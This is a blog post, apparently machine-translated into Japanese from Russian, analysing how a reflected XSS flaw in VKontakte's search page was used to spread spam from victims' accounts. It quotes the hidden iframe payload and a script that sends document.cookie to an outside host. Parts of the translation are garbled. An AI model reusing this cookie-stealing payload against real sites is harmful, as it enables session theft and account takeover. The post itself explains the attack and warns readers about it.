背景 (読めません)
今日家に帰ると、vkontakteに9つのメッセージが表示されます。 なぜなら 私はこのリソースを特に好きではなく、頻繁に訪れません。このイベントは奇妙でした。 メッセージでは、ユーザーはVKontakteで私からスパムが送信されたと書いています。 悪いですが、まあ、パスワードを変更しただけです...私はそれについて考えましたが:古いパスワードは12文字の英数字で、それを削除することはほとんど不可能です。 コンピューターは透明で、伝染性がありません...それで、問題は何ですか?
デブリーフィング
私に代わって送信されたメッセージのテキストを見る:
こんにちは、これはスパムではありません! このメッセージをすべての友人に送信しています。今日、リンク上のページを削除し、完全に取得しました。そのため、何かが必要な場合は、電話するか、電話で連絡する必要があります。 、私は姓と名で行きます。それだけです。そして、今回も私の自然な好奇心が私に失敗したことを理解しています。 昨日、同様のメッセージが私に届いた。もちろん、オペラ座に座って、安心して、私はこのリンクをクリックした。 そして、このページにアクセスして( ログに記録されていないブラウザから! )、コードを見てください。 何が見えますか? 非表示のフローティングフレームがコードにロードされます。
<iframe src = 'http://%76%6b%6f%6e%74%61%6b%74%65%2e%72%75/gsearch.php?q =%27;()())// % 3C%3E%22)// \%22;%3C%3E%22%3C%3E%22%22!---%22?%3E#c [q] =%27%3B()()) %20%20 \&c [section] = people 'style =' display:none; '> </ iframe>リンクは、検索を実行するスクリプトへのURLLencode「vkontakte.ru」につながります。 ご存知のように、検索手順の後、クエリテキストはユーザーに表示され、この場合(これは適切なフィルタリングの欠如も)スパマーによって使用されました。
JavaScriptコードはクエリ文字列に埋め込まれます。この場合、別のフレームのASCIIエンコードコードです。
<script> document.write( '<iframe src = "http://webzer.vov.ru/s.php?dc='+document.cookie+'" style = "display:none;"> </ iframe> ' ); </ script>実際、これはスニッファーで、私のような好奇心users盛なユーザーの連絡先からのCookieが飛び去ります。
この脆弱性は執筆時点で関係があり、単純なアラート(オペラで検証済み) がこれを示しています。 IEでは機能しません。なぜなら、 「data:」プロトコルのサポートはなく、エクスプロイトの作成の専門家でもありません。
いくつかの結論
- 左のリンクをたどらないでください。
- 安全なブラウザは何も保証しません(この場合、「最大のRunetサイト」のXSS脆弱性です)が、警戒は安楽死します
UPD:アラートの例は、公開の3.5時間後に機能しなくなりました。 見る時間がない人のために、 スクリーンショットが保存されました。